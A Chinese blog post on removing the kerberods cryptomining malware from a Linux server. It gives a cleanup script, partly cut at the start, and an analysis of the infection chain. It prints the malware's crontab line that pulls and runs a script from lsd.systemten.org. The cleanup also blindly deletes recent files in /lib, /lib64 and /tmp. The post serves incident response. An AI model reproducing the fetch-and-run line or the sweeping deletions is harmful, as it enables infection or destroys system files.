运维最全Linux 服务器感染kerberods 病毒_busybox chattr -ia ,赶紧收藏

于 2024-05-13 03:29:30 发布
阅读量519 收藏 9
点赞数 28
分类专栏: 程序员 文章标签: 运维 学习 面试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_61068496/article/details/138777836
版权

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化的资料的朋友,可以点击这里获取!

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

17 busybox echo -e “\n0.0.0.0 pastebin.com\n0.0.0.0 thyrsi.com\n0.0.0.0 systemten.org” >> /etc/hosts
18 }
19
20
21 function fixCron(){
22 #修复crontab
23 busybox chattr -i /etc/cron.d/root 2>/dev/null
24 busybox rm -f /etc/cron.d/root
25 busybox chattr -i /var/spool/cron/root 2>/dev/null
26 busybox rm -f /var/spool/cron/root
27 busybox chattr -i /var/spool/cron/tomcat 2>/dev/null
28 busybox rm -f /var/spool/cron/tomcat
29 busybox chattr -i /var/spool/cron/crontabs/root 2>/dev/null
30 busybox rm -f /var/spool/cron/crontabs/root
31 busybox rm -rf /var/spool/cron/tmp.*
32 busybox rm -rf /var/spool/cron/crontabs
33 busybox touch /var/spool/cron/root
34 busybox chattr +i /var/spool/cron/root
35 }
36
37 function killProcess(){
38 #修复异常进程
39 #busybox ps -ef | busybox grep -v grep | busybox grep ‘khugepageds’ | busybox awk ‘{print $1}’ |busybox sed “s/root//g” | busybox xargs kill -9 2>/dev/null
40 #busybox ps -ef | busybox grep -v grep | busybox egrep ‘ksoftirqds’ | busybox awk ‘{print $1}’ |busybox sed “s/root//g” | busybox xargs kill -9 2>/dev/null
41 #busybox ps -ef | busybox grep -v grep | busybox egrep ‘kthrotlds’ | busybox awk ‘{print $1}’ |busybox sed “s/root//g” | busybox xargs kill -9 2>/dev/null
42 #busybox ps -ef | busybox grep -v grep | busybox egrep ‘kpsmouseds’ | busybox awk ‘{print $1}’ |busybox sed “s/root//g” | busybox xargs kill -9 2>/dev/null
43 #busybox ps -ef | busybox grep -v grep | busybox egrep ‘kintegrityds’ | busybox awk ‘{print $1}’ |busybox sed “s/root//g” | busybox xargs kill -9 2>/dev/null
44 busybox ps -ef | busybox grep -v grep | busybox grep ‘/usr/sbin/kerberods’ | busybox awk ‘{print $1}’ |busybox sed “s/root//g” | busybox xargs kill -9 2>/dev/null
45 busybox ps -ef | busybox grep -v grep | busybox grep ‘/usr/sbin/sshd’ | busybox awk ‘{print $1}’ |busybox sed “s/root//g” | busybox xargs kill -9 2>/dev/null
46 busybox ps -ef | busybox grep -v grep | busybox egrep ‘/tmp/kauditds’ | busybox awk ‘{print $1}’ |busybox sed “s/root//g” | busybox xargs kill -9 2>/dev/null
47 busybox ps -ef | busybox grep -v grep | busybox egrep ‘/tmp/sshd’ | busybox awk ‘{print $1}’ |busybox sed “s/root//g” | busybox xargs kill -9 2>/dev/null
48 busybox rm -f /tmp/khugepageds
49 busybox rm -f /tmp/migrationds
50 busybox rm -f /tmp/sshd
51 busybox rm -f /tmp/kauditds
52 busybox rm -f /tmp/migrationds
53 busybox rm -f /usr/sbin/sshd
54 busybox rm -f /usr/sbin/kerberods
55 busybox rm -f /usr/sbin/kthrotlds
56 busybox rm -f /usr/sbin/kintegrityds
57 busybox rm -f /usr/sbin/kpsmouseds
58 busybox find /tmp -mtime -4 -type f | busybox xargs busybox rm -rf
59 }
60
61
62 function clearLib(){
63 #修复动态库
64 busybox chattr -i /etc/ld.so.preload
65 busybox rm -f /etc/ld.so.preload
66 busybox rm -f /usr/local/lib/libcryptod.so
67 busybox rm -f /usr/local/lib/libcset.so
68 busybox chattr -i /etc/ld.so.preload 2>/dev/null
69 busybox chattr -i /usr/local/lib/libcryptod.so 2>/dev/null
70 busybox chattr -i /usr/local/lib/libcset.so 2>/dev/null
71 busybox find /usr/local/lib/ -mtime -4 -type f| busybox xargs rm -rf
72 busybox find /lib/ -mtime -4 -type f| busybox xargs rm -rf
73 busybox find /lib64/ -mtime -4 -type f| busybox xargs rm -rf
74 busybox rm -f /etc/ld.so.cache
75 busybox rm -f /etc/ld.so.preload
76 busybox rm -f /usr/local/lib/libcryptod.so
77 busybox rm -f /usr/local/lib/libcset.so
78 busybox rm -rf /usr/local/lib/libdevmapped.so
79 busybox rm -rf /usr/local/lib/libpamcd.so
80 busybox rm -rf /usr/local/lib/libdevmapped.so
81 busybox touch /etc/ld.so.preload
82 busybox chattr +i /etc/ld.so.preload
83 ldconfig
84 }
85
86 function clearInit(){
87 #修复异常开机项
88 #chkconfig netdns off 2>/dev/null
89 #chkconfig –del netdns 2>/dev/null
90 #systemctl disable netdns 2>/dev/null
91 busybox rm -f /etc/rc.d/init.d/kerberods
92 busybox rm -f /etc/init.d/netdns
93 busybox rm -f /etc/rc.d/init.d/kthrotlds
94 busybox rm -f /etc/rc.d/init.d/kpsmouseds
95 busybox rm -f /etc/rc.d/init.d/kintegrityds
96 busybox rm -f /etc/rc3.d/S99netdns
97 #chkconfig watchdogs off 2>/dev/null
98 #chkconfig --del watchdogs 2>/dev/null
99 #chkconfig --del kworker 2>/dev/null
100 #chkconfig --del netdns 2>/dev/null
101 }
102
103 function recoverOk(){
104 service crond start
105 busybox sleep 3
106 busybox chattr -i /var/spool/cron/root
107 # 将杀毒进程加入到定时任务中,多次杀毒
108 echo “*/10 * * * * /root/kerberods_kill.sh” | crontab -
109 # 恢复被劫持的sshd 服务
110 #busybox cp ~/sshd_new /usr/sbin/sshd
111 #service sshd restart
112 echo “OK,BETTER REBOOT YOUR DEVICE”
113 }
114
115 #先停止crontab服务
116 echo “1| stop crondtab service!”
117 service crond stop
118 #防止病毒继续扩散
119 echo “2| banHosts!”
120 banHosts
121 #清除lib劫持
122 echo “3| clearLib!”
123 clearLib
124 #修复crontab
125 echo “4| fixCron!”
126 fixCron
127 #清理病毒进程
128 echo “5| killProcess!”
129 killProcess
130 #删除异常开机项
131 echo "6| clearInit! "
132 clearInit
133 #重启服务和系统
134 echo “7| recover!”
135 recoverOk


查杀完成以后重启服务器,发现过段时间,登陆主机,无论本地还是ssh远程登陆,依然会有病毒进程被拉起,观察top里面的进程,并用pstree 回溯进程之间的关系,发现每次用户登陆就会有病毒进程被拉起,怀疑登陆时加载文件存在问题,逐个排查下列文件:


* /etc/profile
* ~/.profile
* ~/.bash\_login
* ~/.bash\_profile
* ~/.bashrc
* /etc/bashrc  
 最后终于发现 /etc/bashrc 文件被加入了一些似曾相识的语句  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20200507072931963.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQwOTA3OTc3,size_16,color_FFFFFF,t_70)


## 病毒分析


**1、感染路径**


攻击者通过网络进入第一台被感染的机器(redis未认证漏洞、ssh密码暴力破解登录等)。


第一台感染的机器会读取known\_hosts文件,遍历ssh登录,如果是做了免密登录认证,则将直接进行横向传播。


**2、病毒主要模块**


* 主恶意程序:kerberods
* 恶意Hook库:libcryptod.so libcryptod.c
* 挖矿程序:khugepageds
* 恶意脚本文件:netdns (用作kerberods的启停等管理)
* 恶意程序:sshd (劫持sshd服务,每次登陆均可拉起病毒进程)  
 **3、执行顺序**
* 执行恶意脚本下载命令  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20200507073424807.png)
* 主进程操作



> 
> 1 > 添加至开机启动,以及/etc/bashrc  
>  2 > 生成了sshd文件 劫持sshd服务  
>  3 > 将netdns文件设置为开机启动  
>  4 > 编译libcryptod.c为/usr/local/lib/libcryptod.so  
>  5 > 预加载动态链接库,恶意hook关键系统操作函数  
>  6 > 修改/etc/cron.d/root文件,增加定时任务  
>  7 > 拉起khugepageds挖矿进程
> 
> 
> 


**附病毒恶意进程代码**

1 export PATH=$PATH:/bin:/usr/bin:/sbin:/usr/local/bin:/usr/sbin
2
3 mkdir -p /tmp
4 chmod 1777 /tmp
5
6 echo “* * * * * (curl -fsSL lsd.systemten.org||wget -q -O- lsd.systemten.org)|sh” | crontab -
7
8 ps -ef|grep -v grep|grep hwlh3wlh44lh|awk ‘{print $2}’|xargs kill -9
9 ps -ef|grep -v grep|grep Circle_MI|awk ‘{print $2}’|xargs kill -9
10 ps -ef|grep -v grep|grep get.bi-chi.com|awk ‘{print $2}’|xargs kill -9
11 ps -ef|grep -v grep|grep hashvault.pro|awk ‘{print $2}’|xargs kill -9
12 ps -ef|grep -v grep|grep nanopool.org|awk ‘{print $2}’|xargs kill -9
13 ps -ef|grep -v grep|grep /usr/bin/.sshd|awk ‘{print $2}’|xargs kill -9
14 ps -ef|grep -v grep|grep /usr/bin/bsd-port|awk ‘{print $2}’|xargs kill -9
15 ps -ef|grep -v grep|grep “xmr”|awk ‘{print $2}’|xargs kill -9
16 ps -ef|grep -v grep|grep “xig”|awk ‘{print $2}’|xargs kill -9
17 ps -ef|grep -v grep|grep “ddgs”|awk ‘{print $2}’|xargs kill -9
18 ps -ef|grep -v grep|grep “qW3xT”|awk ‘{print $2}’|xargs kill -9
19 ps -ef|grep -v grep|grep “wnTKYg”|awk ‘{print $2}’|xargs kill -9
20 ps -ef|grep -v grep|grep “t00ls.ru”|awk ‘{print $2}’|xargs kill -9
21 ps -ef|grep -v grep|grep “sustes”|awk ‘{print $2}’|xargs kill -9
22 ps -ef|grep -v grep|grep “thisxxs”|awk ‘{print $2}’ | xargs kill -9
23 ps -ef|grep -v grep|grep “hashfish”|awk ‘{print $2}’|xargs kill -9
24 ps -ef|grep -v grep|grep “kworkerds”|awk ‘{print $2}’|xargs kill -9
25 ps -ef|grep -v grep|grep “/tmp/devtool”|awk ‘{print $2}’|xargs kill -9
26 ps -ef|grep -v grep|grep “systemctI”|awk ‘{print $2}’|xargs kill -9
27 ps -ef|grep -v grep|grep “sustse”|awk ‘{print $2}’|xargs kill -9
28 ps -ef|grep -v grep|grep “axgtbc”|awk ‘{print $2}’|xargs kill -9
29 ps -ef|grep -v grep|grep “axgtfa”|awk ‘{print $2}’|xargs kill -9
30 ps -ef|grep -v grep|grep “6Tx3Wq”|awk ‘{print $2}’|xargs kill -9
31 ps -ef|grep -v grep|grep “dblaunchs”|awk ‘{print $2}’|xargs kill -9

最后的话

最近很多小伙伴找我要Linux学习资料,于是我翻箱倒柜,整理了一些优质资源,涵盖视频、电子书、PPT等共享给大家!

资料预览

给大家整理的视频资料:

给大家整理的电子书资料:

如果本文对你有帮助,欢迎点赞、收藏、转发给朋友,让我有持续创作的动力!

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化的资料的朋友,可以点击这里获取!

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。**

需要这份系统化的资料的朋友,可以点击这里获取!

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

嘻嘻哈哈学编程
关注
  • 28
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
boxlinux:基于Musl,BusyBox和LibreSSL的紧凑型Linux发行版。 有自己的构建系统,使用deb包
02-04
boxlinux:基于Musl,BusyBox和LibreSSL的紧凑型Linux发行版。 有自己的构建系统,使用deb包
busybox-1.31.1-46.apk
03-18
BusyBox 是一个集成了三百多个最常用Linux命令和工具的软件。busybox-1.31.1-46.apk 为最新版官方版(2019-11-4日更新),官网地址:https://github.com/meefik/busybox/releases。
分享7个漂亮的 JetBrains IDE 代码主题,让你的开发体验更高效愉悦
前端达人
03-06 1万+
让您的 IDE 更漂亮,提高你的工作效率作为开发者,我们大部分时间都花在看IDE上。除了好看外,美观的IDE还可以提高生产力。JetBrains是一家专门创建智能开发工具的尖端软件供应商,包括IntelliJ IDEA,PyCharm,Android Studio等。虽然美观的定义取决于个人的观点,但我在这里编制了7个最佳的JetBrains IDE主题,让您的生活更加愉快。1. Material...
Material UI 自定义 (TypeScript)
Baby_Bus666的博客
05-31 1230
Material UI 中的某些组件内部还有其他嵌套组件。例如,一个组件内部Dialog有一个组件。Paper为了自定义嵌套组件的属性,它公开了一个名为的属性,PaperProps您可以使用它来执行此操作。您必须检查才能了解每个组件的所有可用属性。
macOS虚拟机安装全过程(VMware17)
weixin_57308284的博客
06-21 1万+
链接:https://pan.baidu.com/s/1IZXTlXKIpujsPiiN9BBmGQ。打开【unlocker】文件夹,找到【win-install.cmd】文件,右键【以管理员身份运行】链接:https://pan.baidu.com/s/1TWvyzpq1wPanaCsNIrIpVA。结束后可再次按快捷键【ctrl+shift+esc】打开任务管理器,检查所有VMware程序是否关闭。新建虚拟机向导并没有Mac选项,我们需要下载MacOS插件,让VMware支持macOS虚拟机。
3剑客第10天练习题_linux截取ip,并用ip 192,2024Linux运维大厂面试集合
2401_83946070的博客
04-15 455
本书是获得了很多读者好评的Linux经典畅销书**《Linux从入门到精通》的第2版**。本书第﹖版以最新的Ubuntu 12.04为版本,循序渐进地向读者介绍了Linux 的基础应用、系统管理、网络应用、娱乐和办公、程序开发、服务器配置、系统安全等。需要《Linux入门到精通》、《linux系统移植》、《Linux驱动开发入门实战》、《Linux开源网络全栈》电子书籍及教程的工程师朋友们劳烦您转发+评论。/排除内容/{print}’ 文件名。sed -n ‘/排除内容/!1.如何进行排除过滤?
虚拟机怎么安装mac系统?虚拟机安装mac系统教程
tencentcloud_的博客
10-27 797
通过以上几个简单的步骤,我们就可以在虚拟机中成功安装mac系统了。虚拟机给我们提供了一个便捷的方式,在一台计算机上同时运行多个操作系统。打开VMware Workstation Pro软件,在开始界面选择“标准”创建新的虚拟机。设置虚拟机名称和存储位置,并为虚拟机分配足够的内存和硬盘空间。按照提示选择安装来源,并选择合适的客户机操作系统版本。将MacOS系统镜像文件添加到虚拟机中,并启动虚拟机。按照MacOS安装向导的提示,完成系统的安装过程。根据需要,安装和配置所需的驱动程序和软件。
busybox-linux-e680.rar_E680_android e680 patch_busybox_busybox E
09-24
手机嵌入式Linux下可用的busybox源码,可替代shell的多种命令
busybox_1.27.2-2ubuntu3_armhf软件包和源码压缩包
06-09
busybox_1.27.2-2ubuntu3_armhf软件包和源码压缩包
qemu-5.0.0+u-boot+linux-5.4.95+gcc-linaro-6.5.0+busybox-1.32.1.zip
02-05
qemu-5.0.0、u-boot 源码、linux-5.4.95内核、gcc-linaro-6.5.0-2018.12-x86_64_arm-linux-gnueabihf交叉编译链、busybox-1.32.1 工具 文章 https://blog.csdn.net/leacock1991/article/details/113703897 使用资源
docker离线安装rpm
11-13
lxc-libs-1.0.11-1.el6.x86_64.rpm lxc-1.0.11-1.el6.x86_64.rpm lua-lxc-1.0.11-1.el6.x86_64.rpm lua-filesystem-1.4.2-1.el6.x86_64.rpm lua-alt-getopt-0.7.0-1.el6.noarch.rpm libcgroup-0.40.rc1-26.el6.x86_64.rpm docker-engine-1.7.1-1.el6.x86_64.rpm docker-1.5-5.el6.x86_64.rpm docker-ce-17.03.3.ce-1.el7.x8
linux 软连接、硬链接
fang.lovest.yang的博客
02-28 3418
硬链接、软连接、别名
VMware17Pro虚拟机安装macOS教程(超详细)
最新发布
我这孩子从小记性就不好,什么东西都要写下来才放心
04-19 1万+
emmm… 小孩没娘说来话长,由于开发限制,M芯的ARM架构属实有点恶心,我把我用了不到一年的macbook 14 pro给卖掉了,换成了ThinkBook 14+。但是又有点换年macOS系统,所以…
linux 性能监控命令7——sar 命令
changyanmanman的专栏
12-03 2901
sar(System Activity Reporter系统活动情况报告)是目前Linux 上最为全面的系统性能分析工具之一,可以从多方面对系统的活动进行报告,包括:文件的读写情况、系统调用的使用情况、磁盘I/O、CPU效率、内存使用状况、进程活动及IPC有关的活动等。本文主要以CentOS 6.3 x64系统为例,介绍sar命令。 sar命令常用格式 sar [options] [-
windows11安装docker desktop和K8S环境创建镜像和运行dashboard
牧竹子
06-05 2923
windows11安装docker desktop实现docker和K8S环境创建镜像和运行;我们知道docker的安装一般我们是安装在linux系统上的,但是如果你的宿主机是windows,那么你还想装docker,那么就需要现在你的windows上装上虚拟机,虚拟机上装linux操作系统,然后在Linux操作系统上再去安装docker,这样比较麻烦。docker desktop的出现就可以解决上面那个问题,你只需要在windows上开启虚拟化功能,然后安装一下docker desktop就可以了。
红帽7安装
weixin_44454030的博客
08-24 3347
提示:这里对文章进行总结:例如:以上就是今天要讲的内容,本文仅仅简单介绍了redhat的安装,按照操作一步一步来不会有什么问题,其中网络模式,语言分区等自己根据需要选择。有什么问题可以讨论。
内网 centos7 离线安装rpm包的三种方法
热门推荐
苹果2008的博客
03-09 1万+
一、互联网电脑下载rpm包 1.查看互联网电脑是否支持“只下载不安装”功能 执行yum帮助命令: yum --help 如果列表中出现 --downloadonly --downloaddir 参数,则表示目前yum已支持只下载不安装。 没有出现则还需安装一个插件yum-plugin-downloadonly 安装命令如下:yum install -y yum-plugin-downloadonly 2.下载安装包,将tigervnc-server安装包下载到/software/tigervn.
【yum】linux离线安装rpm包及其依赖和卸载包及其依赖,各种风格的Linux运维面试题进来了解一下
2401_84140754的博客
04-06 965
先安装并升级,这个U建议加上,因为有些命令安装是有升级的服务的,如果不加U就失败了【比如java】【如何确定哪些包有升级的包,直接在通外网的服务器上yum安装该服务,看过程即可】:这是下载存放的路径,可以不要这行,但建议加上【不加这行下载的默认路径我不知道在哪,也懒的去查,你可以用 find 查询下载的包看出默认路径的。下载离线包的这台主机不能先安装该包,否则无法下载,如果已经安装该包,那么必须先卸载需要离线的包及其依赖,方法见下面的yum卸载包及其依赖。3、现在给你三百台服务器,你怎么对他们进行管理?
Windows下安装docker图文教程
qq_74166001的博客
03-08 2225
Docker是一种开源的容器化平台,可以将软件应用及其依赖项打包成一个独立的、可移植的容器,然后在任何环境中运行。通过使用Docker,开发人员可以轻松地构建、发布和运行应用,无论是在本地开发环境还是在云端部署。Docker的出现极大地简化了软件开发和交付的过程,提高了开发效率和应用的可移植性。本文将具体介绍在windows系统下面安装docker软件提示:本文内容仅适合新手。
make cross_compile=arm-linux-,利用make CROSS_COMPILE=arm-linux- 编译busybox 出错
05-25
出现错误的原因可能是交叉编译器的路径没有设置正确。请尝试以下步骤: 1. 确认你已经安装了交叉编译器,并且路径正确。可以使用以下命令来测试一下: ``` $ arm-linux-gcc -v ``` 如果输出了交叉编译器的版本信息,则说明交叉编译器已经安装好了。 2. 设置交叉编译器的路径。可以使用以下命令: ``` $ export CROSS_COMPILE=arm-linux- ``` 3. 进入 busybox 的源代码目录,执行 make 命令: ``` $ cd /path/to/busybox $ make menuconfig ``` 在界面中选择需要编译的功能,然后保存并退出。 4. 执行 make 命令: ``` $ make ``` 如果还是出现错误,可以在执行 make 命令时加上 V=1 参数,以显示详细的编译信息: ``` $ make V=1 ``` 这样就可以查看具体的编译错误信息了。根据错误信息进行调整即可。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值